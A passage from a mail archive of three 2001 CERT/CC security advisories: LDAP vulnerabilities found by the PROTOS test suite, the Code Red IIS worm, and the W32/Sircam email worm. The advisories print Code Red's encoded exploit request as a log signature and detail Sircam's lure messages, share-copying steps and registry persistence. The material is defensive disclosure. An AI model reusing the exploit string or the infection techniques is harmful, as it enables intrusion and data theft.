LDAP-specific application anomalies. Each section is further divided into "groups" that collectively exercise a particular encoding or application feature. Finally, each group contains one or more "test cases," which represent the network packets that are used to test individual exceptional conditions. By applying the PROTOS LDAPv3 test suite to a variety of popular LDAP-enabled products, the OUSPG revealed the following vulnerabilities: VU#276944 - iPlanet Directory Server contains multiple vulnerabilities in LDAP handling code The iPlanet Directory Server contains multiple vulnerabilities in the code that processes LDAP requests. In the encoding section of the test suite, this product had an indeterminate number of failures in the group that tests invalid BER length of length fields. In the application section of the test suite, this product failed four groups and had inconclusive results for an additional five groups. The four failed groups indicate the presence of buffer overflow vulnerabilities. For the inconclusive groups, the product exhibited suspicious behavior while testing for format string vulnerabilities. VU#505564 - IBM SecureWay Directory is vulnerable to denial-of-service attacks via LDAP handling code The IBM SecureWay Directory server contains one or more vulnerabilities in the code that processes LDAP requests. These vulnerabilities were discovered independently by IBM using the PROTOS LDAPv3 test suite. The CERT/CC is not currently aware of the nature of these vulnerabilities. VU#583184 - Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code The Lotus Domino R5 Server Family (including the Enterprise, Application, and Mail servers) contains multiple vulnerabilities in the code that processes LDAP requests. In the encoding section of the test suite, this product failed 1 of 77 groups. The failed group tests a server's response to miscellaneous packets with semi-valid BER encodings. In the application section of the test suite, this product failed 23 of 77 groups. These results suggest that both buffer overflow and format string vulnerabilities are likely to be present in a variety of application components. VU#688960 - Teamware Office contains multiple vulnerabilities in LDAP handling code The Teamware Office suite is packaged with a combination X.500/LDAP server that provides directory services. Multiple versions of the Office product contain vulnerabilities that cause the LDAP server to crash in response to traffic sent by the PROTOS LDAPv3 test suite. In the encoding section of the test suite, this product failed 9 of 16 groups involving invalid encodings for several BER object types. In the application section of the test suite, this product failed 4 of 32 groups. The remaining 45 groups were not exercised during the test runs. The four failed groups indicate the presence of buffer overflow vulnerabilities. VU#717380 - Potential vulnerabilities in Qualcomm Eudora WorldMail Server LDAP handling code While investigating the vulnerabilities reported by OUSPG, it was brought to our attention that the Eudora WorldMail Server may contain vulnerabilities that can be triggered via the PROTOS test suite. The CERT/CC has reported this possibility to Qualcomm and an investigation is pending. VU#763400 - Microsoft Exchange 5.5 LDAP Service is vulnerable to denial-of-service attacks The Microsoft Exchange 5.5 LDAP Service contains a vulnerability that causes the LDAP server to freeze in response to malformed LDAP requests generated by the PROTOS test suite. This only affects the LDAP service; all other Exchange services, including mail handling, continue normally. Although this product was not included in OUSPG's initial testing, subsequent informal testing revealed that the LDAP service of the Microsoft Exchange 5.5 became unresponsive while processing test cases containing exceptional BER encodings for the LDAP filter type field. VU#765256 - Network Associates PGP Keyserver contains multiple vulnerabilities in LDAP handling code The Network Associates PGP Keyserver 7.0 contains multiple vulnerabilities in the code that processes LDAP requests. In the encoding section of the test suite, this product failed 12 of 16 groups. In the application section of the test suite, this product failed 1 of 77 groups. The failed group focused on out-of-bounds integer values for the messageID parameter. Due to a peculiarity of this test group, this failure may actually represent an encoding failure. VU#869184 - Oracle 8i Enterprise Edition contains multiple vulnerabilities in LDAP handling code The Oracle 8i Enterprise Edition server contains multiple vulnerabilities in the code used to process LDAP requests. In the encoding section of the test suite, this product failed an indeterminate number of test cases in the group that tests a server's response to invalid encodings of BER OBJECT-IDENTIFIER values. In the application section of the test suite, this product failed 46 of 77 groups. These results suggest that both buffer overflow and format string vulnerabilities are likely to be present in a variety of application components. VU#935800 - Multiple versions of OpenLDAP are vulnerable to denial-of-service attacks There are multiple vulnerabilities in the OpenLDAP implementations of the LDAP protocol. These vulnerabilities exist in the code that translates network datagrams into application-specific information. In the encoding section of the test suite, this product failed the group that tests the handling of invalid BER length of length fields. In the application section of the test suite, this product passed all 6685 test cases. Additional Information For the most up-to-date information regarding these vulnerabilities, please visit the CERT/CC Vulnerability Notes Database at: http://www.kb.cert.org/vuls/ Please note that the test results summarized above should not be interpreted as a statement of overall software quality. However, the CERT/CC does believe that these results are useful in describing the characteristics of these vulnerabilities. For example, an application that fails multiple groups indicates that problems exist in different areas of the code, rather than in a specific code segment. II. Impact VU#276944 - iPlanet Directory Server contains multiple vulnerabilities in LDAP handling code One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Directory Server. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment under Windows NT 4.0, but they may affect other platforms as well. VU#505564 - IBM SecureWay Directory is vulnerable to denial-of-service attacks via LDAP handling code These vulnerabilities allow a remote attacker to crash affected SecureWay Directory servers, resulting in a denial-of-service condition. It is not known at this time whether these vulnerabilities will allow a remote attacker to execute arbitrary code. These vulnerabilities exist on the Solaris and Windows 2000 platforms but are not present under Windows NT, AIX, and AIX with SSL. VU#583184 - Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Domino server. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment. VU#688960 - Teamware Office contains multiple vulnerabilities in LDAP handling code These vulnerabilities allow a remote attacker to crash affected Teamware LDAP servers, resulting in a denial-of-service condition. They may also allow a remote attacker to execute arbitrary code with the privileges of the Teamware server. The server typically runs with system privileges. VU#717380 - Potential vulnerabilities in Qualcomm Eudora WorldMail Server LDAP handling code The CERT/CC has not yet determined the impact of this vulnerability. VU#763400 - Microsoft Exchange 5.5 LDAP Service is vulnerable to denial-of-service attacks This vulnerability allows a remote attacker to crash the LDAP component of vulnerable Exchange 5.5 servers, resulting in a denial-of-service condition within the LDAP component. VU#765256 - Network Associates PGP Keyserver contains multiple vulnerabilities in LDAP handling code One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Keyserver. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment. VU#869184 - Oracle 8i Enterprise Edition contains multiple vulnerabilities in LDAP handling code One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Oracle server. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment. VU#935800 - Multiple versions of OpenLDAP are vulnerable to denial-of-service attacks These vulnerabilities allow a remote attacker to crash affected OpenLDAP servers, resulting in a denial-of-service condition. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. Please consult this appendix to determine if you need to contact your vendor directly. Block access to directory services at network perimeter As a temporary measure, it is possible to limit the scope of these vulnerabilities by blocking access to directory services at the network perimeter. Please note that this workaround does not protect vulnerable products from internal attacks. ldap 389/tcp # Lightweight Directory Access Protocol ldap 389/udp # Lightweight Directory Access Protocol ldaps 636/tcp # ldap protocol over TLS/SSL (was sldap) ldaps 636/udp # ldap protocol over TLS/SSL (was sldap) Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. IBM Corporation IBM and Tivoli are currently investigating the details of the vulnerabilities in the various versions of the SecureWay product family. Fixes are being implemented as these details become known. Fixes will be posted to the download sites (IBM or Tivoli) for the affected platform. See http://www-1.ibm.com/support under "Server Downloads" or "Software Downloads" for links to the fix distribution sites. iPlanet E-Commerce Solutions [CERT/CC Addendum: These vulnerabilities were originally discovered in Directory Server 5.0 Beta and were later found to exist in versions up to and including version 4.13. These vulnerabilities have been addressed in the released version of Directory Server 5.0.] Lotus Development Corporation Lotus reproduced the problem as reported by OUSPG and documented it in SPR#DWUU4W6NC8. Lotus considers security issues as top priority, so we acted quickly to resolve the problem in a maintenance update to Domino. It was addressed in Domino R5.0.7a, which was released on May 18th, 2001. This release can be downloaded from Notes.net at http://www.notes.net/qmrdown.nsf/qmrwelcome. The fix is documented in the fix list at http://www.notes.net/r5fixlist.nsf/Search!SearchView&Query=DWUU 4W6NC8 Microsoft Corporation Microsoft is developing a hotfix for this issue which will be available shortly. Customers can obtain this hotfix by contacting Product Support Services at no charge and asking for Q303448 and Q303450. Information on contacting Microsoft Product Support Services can be found at http://www.microsoft.com/support/ Network Associates, Inc. Network Associates has resolved these vulnerabilities in Hotfix 2 for both Solaris and Windows NT. All Network Associates Enterprise Support customers have been notified and have been provided access to the Hotfix. This Hotfix can be downloaded at http://www.pgp.com/downloads/default.asp The OpenLDAP Project [CERT/CC Addendum: To address these vulnerabilities, the OpenLDAP Project has released OpenLDAP 1.2.12 for use in LDAPv2 environments and OpenLDAP 2.0.8 for use in LDAPv3 environments. The CERT/CC recommends that users of OpenLDAP contact their software vendor or obtain the latest version, available at http://www.openLDAP.org/software/download/.] QUALCOMM Incorporated The LDAP service in WorldMail may be vulnerable to this exploit, but our tests so far have been inconclusive. At this time, we strongly urge all WorldMail customers to ensure that the LDAP service is not accessible from outside their organization nor by untrusted users. The Teamware Group An issue has been discovered with Teamware Office Enterprise Directory (LDAP server) that shows a abnormal termination or loop when the LDAP server encounters a maliciously or incorrectly created LDAP request data. If the maliciously formatted LDAP request data is requested, the LDAP server may excessively copy the LDAP request data to the stack area. This overflow is likely to cause execution of malicious code. In other case, the LDAP server may go into abnormal termination or infinite loop. [CERT/CC Addendum: Teamware has provided additional documentation of these issues in their "Teamware Solution Database," available at http://support.teamw.com/Online/s_database1.shtml. Registered users can find information on these vulnerabilities by searching for document #010703-0000 for Windows NT or document #010703-0001 for Solaris.] Appendix B. - Supplemental Information The PROTOS Project The PROTOS project is a research partnership between the University of Oulu and VTT Electronics, an independent research organization owned by the Finnish government. The project studies methods by which protocol implementations can be tested for information security defects. Although the vulnerabilities discussed in this advisory relate specifically to the LDAP protocol, the methodology used to research, develop, and deploy the PROTOS LDAPv3 test suite can be applied to any communications protocol. For more information on the PROTOS project and its collection of test suites, please visit http://www.ee.oulu.fi/research/ouspg/protos/ ASN.1 and the BER Abstract Syntax Notation One (ASN.1) is a flexible notation that allows one to define a variety data types. The Basic Encoding Rules (BER) describe how to represent or encode the values of each ASN.1 type as a string of octets. This allow programmers to encode and decode data for platform-independent transmission over a network. References The following is a list of URLs referenced in this advisory as well as other useful sources of information: http://www.cert.org/advisories/CA-2001-18.html http://www.ietf.org/rfc/rfc2116.txt http://www.ietf.org/rfc/rfc2251.txt http://www.ietf.org/rfc/rfc2252.txt http://www.ietf.org/rfc/rfc2253.txt http://www.ietf.org/rfc/rfc2254.txt http://www.ietf.org/rfc/rfc2255.txt http://www.ietf.org/rfc/rfc2256.txt http://www.ee.oulu.fi/research/ouspg/protos/ http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/ http://www.kb.cert.org/vuls/ http://www.kb.cert.org/vuls/id/276944 http://www.kb.cert.org/vuls/id/505564 http://www.kb.cert.org/vuls/id/583184 http://www.kb.cert.org/vuls/id/688960 http://www.kb.cert.org/vuls/id/717380 http://www.kb.cert.org/vuls/id/763400 http://www.kb.cert.org/vuls/id/765256 http://www.kb.cert.org/vuls/id/869184 http://www.kb.cert.org/vuls/id/935800 _________________________________________________________________ The CERT Coordination Center thanks the Oulu University Secure Programming Group for reporting these vulnerabilities to us, for their detailed technical analyses, and for their assistance in preparing this advisory. We also thank the many vendors who provided feedback regarding their respective vulnerabilities. _________________________________________________________________ Authors: Jeffrey P. Lanza and Cory F. Cohen. Feedback on this advisory is greatly appreciated. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-18.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History Jul 16, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO1O5eQYcfu8gsZJZAQGupwQAikpVVn5wK0o9Kzdl3wjFf2jEhbyr3Ngz ycfKTYp8GfaKvKf9HzM/861WBmAkRIkChM+t9mQZ2FuH6nNMzfYRputHb3MK5w18 8EOE/stQbV0kDgXxi078ELkvZy4tqrNhd7KXNtsFCPvwo7XTrJJFLTpCS5Nltheq PaynurnhNrw= =mEjW -----END PGP SIGNATURE----- From - Thu Jul 19 18:25:09 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6K1FFL24943; Thu, 19 Jul 2001 18:15:15 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id TAA00316; Thu, 19 Jul 2001 19:19:03 -0400 (EDT) Date: Thu, 19 Jul 2001 19:19:03 -0400 (EDT) Received: by canaveral.red.cert.org; Thu, 19 Jul 2001 19:14:11 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-19 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 8cfff4d3147d1024de536d0a67a367d7 Status: RO X-Status: X-Keywords: X-UID: 15 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-19 "Code Red" Worm Exploiting Buffer Overflow In IIS Indexing Service DLL Original release date: July 19, 2001 Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Systems running Microsoft Windows NT 4.0 and Windows 2000 with IIS 4.0 or IIS 5.0 enabled Overview The CERT/CC has received reports of new self-propagating malicious code that exploits certain configurations of Microsoft Windows susceptible to the vulnerability described in CERT advisory CA-2001-13 Buffer Overflow In IIS Indexing Service DLL. These reports indicate that the "Code Red" worm may have already affected as many as 225,000 hosts, and continues to spread rapidly. Description In examples we have seen, the "Code Red" worm attack proceeds as follows: * The victim host is scanned for TCP port 80 by the "Code Red" worm. * The attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Indexing Service described in CERT advisory CA-2001-13 * If the exploit is successful, the worm begins executing on the victim host. Initially, the existence of the c:\notworm file is checked. Should this file be found, the worm ceases execution. * If c:\notworm is not found, the worm begins spawning threads to scan seemingly random IP addresses for hosts listening on TCP port 80, exploiting any vulnerable hosts it finds. * If the victim host's default language is English, then after 100 scanning threads have started and a certain period of time has elapsed following infection, all web pages served by the victim host are defaced with the message HELLO! Welcome to http://www.worm.com! Hacked By Chinese! * If the victim host's default language is not English, the worm will continue scanning but no defacement will occur. System Footprint The "Code Red" worm can be identified on victim machines by the presence of the following string in IIS log files: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a Additionally, web pages on victim machines may be defaced with the following message: HELLO! Welcome to http://www.worm.com! Hacked By Chinese! The text of this page is stored exclusively in memory and is not written to disk. Therefore, searching for the text of this page in the file system may not detect compromise. Network Footprint A host running an active instance of the "Code Red" worm scans random IP addresses on port 80/TCP looking for other hosts to infect. Additional detailed analysis of this worm has been published by eEye Digital Security at http://www.eeye.com. Impact In addition to web site defacement, infected systems may experience performance degradation as a result of the scanning activity of this worm. Non-compromised systems and networks that are being scanned by other hosts infected by the "Code Red" worm may experience severe denial of service. This occurs because each instance of the "Code Red" worm uses the same random number generator seed to create the list of IP addresses it scans. Therefore, all victim hosts scan the same IP addresses. Furthermore, it is important to note that while the "Code Red" worm appears to merely deface web pages on affected systems and attack other systems, the IIS indexing vulnerability it exploits can be used to execute arbitrary code in the Local System security context. This level of privilege effectively gives an attacker complete control of the victim system. Solutions The CERT/CC encourages all Internet sites to review CERT advisory CA-2001-13 and ensure workarounds or patches have been applied on all affected hosts on your network. If you believe a host under your control has been compromised, you may wish to refer to http://www.cert.org/tech_tips/win-UNIX-system_compromise.html Reporting The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#36881]". ______________________________________________________________________ Author(s): Roman Danyliw and Allen Householder ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-19.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History Jul 19, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO1dohAYcfu8gsZJZAQGazQP/YSiWvPHNreLfTIBPp0JwM0KpJJ3Lif5y BtF1G+EuE9tN+PQwF4HO4gC3h02VmJDb02IKMtiHTQxldN7fkzzodcjK7dNpc20x YlNC/ez0XKpy+TRKNB9Rw/l/d+vglMRL5nt8ZaKocaGO7z1AYz8spVmhLnjXg3sU kS2E8WJf38w= =Ox7X -----END PGP SIGNATURE----- From - Wed Jul 25 14:16:12 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6PLCPk10456; Wed, 25 Jul 2001 14:12:25 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA26035; Wed, 25 Jul 2001 14:39:58 -0400 (EDT) Date: Wed, 25 Jul 2001 14:39:58 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 25 Jul 2001 14:34:41 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-22 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: bb031ad6c08bb79bd1d1cf707dc749d4 Status: RO X-Status: X-Keywords: X-UID: 16 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-22 W32/Sircam Malicious Code Original release date: July 25, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft Windows (all versions) Overview "W32/Sircam" is malicious code that spreads through email and potentially through unprotected network shares. Once the malicious code has been executed on a system, it may reveal or delete sensitive information. As of 10:00EST(GMT-4) Jul 25, 2001 the CERT/CC has received reports of W32/Sircam from over 300 individual sites. I. Description W32/Sircam can infect a machine in one of two ways: * When executed by opening an email attachment containing the malicious code * By copying itself into unprotected network shares Propagation Via Email The virus can appear in an email message written in either English or Spanish with a seemingly random subject line. All known versions of W32/Sircam use the following format in the body of the message: English Hi! How are you? [middle line] See you later. Thanks Spanish Hola como estas ? [middle line] Nos vemos pronto, gracias. Where [middle line] is one of the following: English I send you this file in order to have your advice I hope you like the file that I sendo you I hope you can help me with this file that I send This is the file with the information you ask for Spanish Te mando este archivo para que me des tu punto de vista Espero te guste este archivo que te mando Espero me puedas ayudar con el archivo que te mando Este es el archivo con la informacion que me pediste Users who receive copies of the malicious code through electronic mail might recognize the sender. We encourage users to avoid opening attachments received through electronic mail, regardless of the sender's name, without prior knowledge of the origin of the file or a valid digital signature. The email message will contain an attachment whose name matches the subject line and has a double file extension (e.g. subject.ZIP.BAT or subject.DOC.EXE). The CERT/CC has confirmed reports that the first extension may be .DOC, .XLS, or .ZIP. Anti-virus vendors have referred to additional extensions, including .GIF, .JPG, .JPEG, .MPEG, .MOV, .MPG, .PDF, .PNG, and .PS. The second extension will be .EXE, .COM, .BAT, .PIF, or .LNK. The attached file contains both the malicious code and the contents of a file copied from an infected system. When the attachment is opened, the copied file is extracted to both the %TEMP% folder (usually C:\WINDOWS\TEMP) and the Recycled folder on the affected system. The original file is then opened using the appropriate default viewer while the infection process continues in the background. It is possible for the recipient to be tricked into opening this malicious attachment since the file will appear without the .EXE, .BAT, .COM, .LNK, or .PIF extensions if the "Hide file extensions for known file types" is enabled in Windows. See IN-2000-07 for additional information on the exploitation of hidden file extensions. W32/Sircam includes its own SMTP client capabilities, which it uses to propagate via email. It determines its recipient list by recursively searching for email addresses contained in all *.wab (Windows Address Book) files in the %SYSTEM% folder. Additionally, it searches the folders referred to by HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Shell Folders\Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Shell Folders\Desktop for files containing email addresses. All addresses found are stored in SC??.DLL or S??.DLL files hidden in the %SYSTEM% folder. W32/Sircam first attempts to send messages using the default email settings for the current user. If the default settings are not present, it appears to use one of the following SMTP relays: * prodigy.net.mx * NetBIOS name for 'MAIL' * mail. (e.g., mail.example.org) * dobleclick.com.mx * enlace.net * goeke.net Propagation Via Network Shares In addition to email-based propagation, analysis by anti-virus vendors suggests that W32/Sircam can spread through unprotected network shares. Unlike the email propagation method, which requires a user to open an attachment to infect the machine, propagation of W32/Sircam via network shares requires no human intervention. If W32/Sircam detects Windows networking shares with write access, it 1. copies itself to \\[share]\Recycled\SirC32.EXE 2. appends "@ win\Recycled\SirC32.exe" to AUTOEXEC.BAT If the share contains a Windows folder, it also 3. copies \\[share]\Windows\rundll32.exe to \\[share]\Windows\run32.exe 4. copies itself to \\[share]\Windows\rundll32.exe 5. when virus is executed from rundll32.exe, it calls run32.exe Infection process 1. When installed on a victim machine, W32/Sircam installs a copy of itself in two hidden files: + %SYSTEM%\SCam32.exe + Recycled\SirC32.exe Installing in Recycled may hide it from anti-virus software since some do not check this folder by default. Based on external analyses, there is also a probability that W32/Sircam will copy itself to the %SYSTEM% folder as ScMx32.exe. In that case, another copy is created in the folder referred to by HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explor er\Shell Folders\Startup (the current user's personal startup folder). The copy created in that location is named Microsoft Internet Office.exe. When the affected user next logs in, this copy of W32/Sircam will be started automatically. 2. The registry entry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunSe rvices\Driver32 is set to %SYSTEM%\SCam32.exe so that W32/Sircam will run automatically at system startup. 3. The registry entry HKEY_CLASSES_ROOT\exefile\shell\open\command is set to "C:\Recycled\SirC32.exe" "%1" %*", causing W32/Sircam to execute whenever another executable is run. 4. A new registry entry, HKEY_LOCAL_MACHINE\Software\SirCam, is created to store data required by W32/Sircam during execution. 5. W32/Sircam searches for filenames with .DOC, .XLS, .ZIP extensions in the folders referred to by HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi on\Explorer\Shell Folders\Personal HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi on\Explorer\Shell Folders\Desktop While the personal folder may vary with configuration, it is often set to \My Documents or \Windows\Profiles\%username%\Personal. A list of these files is stored in %SYSTEM%\scd.dll. 6. W32/Sircam attaches its own binary to selected files it finds and stores the combined file in the Recycled folder. II. Impact W32/Sircam can have a direct impact on both the computer which was infected as well as those with which it communicates over email. * Breaches of confidentiality: The malicious code will at a minimum search through select folders and mail potentially sensitive files. This form of attack is extremely serious since it is one from which it is impossible to recover. Once a file has been publicly distributed, any potentially sensitive information in it cannot be retracted. * Limit Availibility (Denial of Service) + Fill entire hard drive: Based on external analyses, on any given day, there is a probability that it will create a file named C:\Recycled\sircam.sys which consumes all free space on the C: drive. A full disk will prevent users from saving files to that drive, and in certain configurations impede system-level tasks (e.g., swapping, printing). + Propagation via mass emailing: W32/Sircam will attempt to propagate by sending itself through email to addresses obtained as described above. This propagation can lead to congestion in mail servers that may prevent them from functioning as expected. NOTE: Since W32/Sircam uses native SMTP routines connecting to pre-defined mail servers, propagation is independent of the mail client software used. * Loss of Integrity: Published reports indicate that on October 16 there is a reasonable probability that W32/Sircam will attempt to recursively delete all files from the drive on which Windows is installed (typically C:). III. Solution Run and Maintain an Anti-Virus Product It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus information can be found in Appendix A. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available. Exercise Caution When Opening Attachments Exercise caution when receiving email with attachments. Users should never open attachments from an untrusted origin, or ones that appear suspicious in any way. Finally, cryptographic checksums should also be used to validate the integrity of the file. The effects of this class of malicious code are activated only when the file in question is executed. Social engineering is typically employed to trick a recipient into executing the malicious file. The best advice with regard to malicious files is to avoid executing them in the first place. The following tech tip offers suggestions as to how to avoid them: Protecting yourself from Email-borne Viruses and Other Malicious Code During Y2K and Beyond Filter the Email or use a Firewall Sites can use email filtering techniques to delete messages containing subject lines known to contain the malicious code, or they can filter all attachments. Likewise, a firewall or border router can be used to stop the W32/Sircam outbound SMTP connections to mail servers outside of the local network. This filtering strategy will prevent further propagation of the worm from a particular host when the local mail configuration is not used. Appendix A. - Vendor Information Aladdin Knowledge Systems http://www.esafe.com/home/csrt/valerts2.asp?virus_no=10068 Central Command, Inc. http://support.centralcommand.com/cgi-bin/command.cfg/php/endus er/std_adp.php?p_refno=010718-000010 Command Software Systems http://www.commandsoftware.com/virus/sircam.html Computer Associates http://www.cai.com/virusinfo/encyclopedia/descriptions/s/sircam 137216.htm Data Fellows Corp http://www.datafellows.com/v-descs/sircam.shtml McAfee http://vil.mcafee.com/dispVirus.asp?virus_k=99141& Norman Data Defense Systems http://www.norman.com/virus_info/w32_sircam.shtml Panda Software http://www.pandasoftware.es/vernoticia.asp?noticia=987 Proland Software http://www.pspl.com/virus_info/worms/sircam.htm Sophos http://www.sophos.com/virusinfo/analyses/w32sircama.html Symantec http://www.symantec.com/avcenter/venc/data/w32.sircam.worm@mm.h tml Trend Micro http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName= TROJ_SIRCAM.A You may wish to visit the CERT/CC's Computer Virus Resources Page located at: http://www.cert.org/other_sources/viruses.html ______________________________________________________________________ Authors: Roman Danyliw, Chad Dougherty, Allen Householder ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-22.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History July 25, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv 